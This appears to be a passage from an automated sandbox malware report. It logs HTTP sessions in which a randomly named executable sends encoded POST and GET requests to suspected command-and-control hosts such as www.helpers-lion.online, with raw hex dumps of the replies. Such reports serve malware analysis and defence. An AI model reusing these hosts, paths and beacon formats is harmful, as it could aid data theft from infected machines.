e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 13, 2024 06:45:27.053556919 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 13, 2024 06:45:27.053579092 CEST	1236	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 13, 2024 06:45:27.053595066 CEST	114	IN	Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49746	194.58.112.174	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:28.896943092 CEST	811	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 68 64 69 79 43 46 59 6d 31 70 78 4a 57 53 67 74 73 39 72 4e 6e 70 62 4f 2b 58 42 30 5a 38 72 76 62 50 42 76 75 31 Data Ascii: jN=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JahdiyCFYm1pxJWSgts9rNnpbO+XB0Z8rvbPBvu1
Aug 13, 2024 06:45:29.592017889 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 13 Aug 2024 04:45:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 13, 2024 06:45:29.592065096 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 13, 2024 06:45:29.592099905 CEST	1236	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 13, 2024 06:45:29.592153072 CEST	114	IN	Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49747	194.58.112.174	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:31.495299101 CEST	1828	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 62 75 75 39 4d 5a 49 6e 38 46 54 36 31 45 67 54 4f 34 46 57 67 4c 76 4c 47 2f 6c 4f 46 54 67 4f 69 62 62 4c 4c 58 56 58 55 76 76 72 54 38 45 5a 48 61 38 52 30 6b 54 5a 35 66 36 67 57 76 45 58 74 5a 53 34 51 63 44 71 64 4c 77 57 68 6c 78 45 62 76 2f 70 42 36 67 4f 4a 2b 6e 75 4c 52 6e 56 37 4d 4f 30 59 57 7a 76 38 44 6f 78 38 55 69 6f 51 6e 33 31 57 6d 6f 67 45 52 56 35 53 31 58 77 38 56 45 6a 76 4e 6a 34 66 30 6d 72 48 73 56 62 7a 4c 6c 52 37 79 32 73 66 59 6f 32 33 35 4e 45 49 54 76 56 51 [TRUNCATED] Data Ascii: jN=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYbuu9MZIn8FT61EgTO4FWgLvLG/lOFTgOibbLLXVXUvvrT8EZHa8R0kTZ5f6gWvEXtZS4QcDqdLwWhlxEbv/pB6gOJ+nuLRnV7MO0YWzv8Dox8UioQn31WmogERV5S1Xw8VEjvNj4f0mrHsVbzLlR7y2sfYo235NEITvVQhmOmbpCT1nHQt96q5JUCK1uWjyulrDMBYqy34k65tRtH2I0sCMDIk7Z0dh7R1+hjQaxOPM8bt46Uw/SDsIeeNdQKJOjaZDIMOBHyLlhw5KW63SPWl5zoUmAkgwvT0qnZJf/wFUbMsGvVIY6c6m6hBOjR9QjPQuuH3qVREkObjeby7SXONfF8ciDB0y3Lxz715sJIYro+S07it6tejwvIByCgWQBbfs3pAXGMmw0/SK3HMatCyr6i76pdQcaJ7m745tW7SG/0kUVC1hn3irBfC+53fdULj6JwDlXi8vrnXDcgfxuUetREtjPoMGLSmmvwLxMjvdGH9SXsgYRj+qFrUdO6Zc0HQQ5ZP1JMDL/Gt06iw38c1MKXXAAzHGSikCdltif2vdtsyVIbYJl8/lziM7Yst4k1Jt/tZzPz8QmaqBe93TGPbGfKk9NxfVTp34V4SDhkSPLMWQXXQTiGvPCUdZqQAtlFIc75WGArFacFdvXkZwsNUO1IVhm4WbBpmiqzEU0QySiSBi9eUIrNfHTiW0Mm8dLBObB50f+0G1nGnNi4Lr82BD3fGuqUKO2cXo2xKuTSze87Npk9AqOjJ1FEz1i3j7N1MEz4TAr9IKWPMNi6VJ/WYuNL73EwQl50Gj7ZwC0xlsVmH9X4BoPxXD1rJ9CUkAWYxzyhCQ [TRUNCATED]
Aug 13, 2024 06:45:32.151240110 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 13 Aug 2024 04:45:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 13, 2024 06:45:32.151288986 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 13, 2024 06:45:32.151329041 CEST	448	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 13, 2024 06:45:32.151361942 CEST	902	IN	Data Raw: d5 f1 25 d9 7d 03 ef 1b 2a 65 6a 57 ae ae 9f b8 3c 91 50 0f 68 e2 fe 1c dd cb d9 81 54 ea 34 79 b4 62 1f b6 30 68 4b 5f 25 b5 08 f6 ab e9 e7 03 2f c3 02 dc 14 b1 7e 5e 97 51 cf a4 6f fe a0 52 85 be ca 4b 78 14 e1 b6 f1 a4 a0 a1 5d ac 60 9a 54 28 Data Ascii: %}*ejW<PhT4yb0hK_%/~^QoRKx]`T(=ky".kZsJE,fF9Mly%WUu3]ZZTSfC!zRfG&YCDHy^:)/Vge%H4m2x~k0\6{uFH>&cQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49748	194.58.112.174	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:34.107176065 CEST	518	OUT	GET /mooq/?uXTT=8FDHY8dP&jN=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.helpers-lion.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:45:34.777005911 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 13 Aug 2024 04:45:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED] Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://r [TRUNCATED]
Aug 13, 2024 06:45:34.777066946 CEST	1236	IN	Data Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
Aug 13, 2024 06:45:34.777105093 CEST	1236	IN	Data Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
Aug 13, 2024 06:45:34.777141094 CEST	1236	IN	Data Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
Aug 13, 2024 06:45:34.777175903 CEST	1236	IN	Data Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
Aug 13, 2024 06:45:34.777214050 CEST	1120	IN	Data Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 Data Ascii:   .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
Aug 13, 2024 06:45:34.777318954 CEST	1236	IN	Data Raw: 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 72 6d 61 6c 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 6d 65 64 69 75 6d 40 64 65 73 6b 74 6f 70 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0 Data Ascii: n_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL-    !
Aug 13, 2024 06:45:34.777354002 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 Data Ascii: } } var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&r
Aug 13, 2024 06:45:34.777390003 CEST	1025	IN	Data Raw: 20 27 6e 6f 6e 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f Data Ascii: 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer \|\| []; f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49749	172.67.210.102	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:39.824090958 CEST	773	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 51 70 69 6b 74 2f 64 52 4d 64 44 38 2b 4d 5a 6a 56 35 66 32 34 65 4b 6d 37 2b 32 57 69 6c 31 48 68 42 65 69 67 41 3d Data Ascii: jN=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDQpikt/dRMdD8+MZjV5f24eKm7+2Wil1HhBeigA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
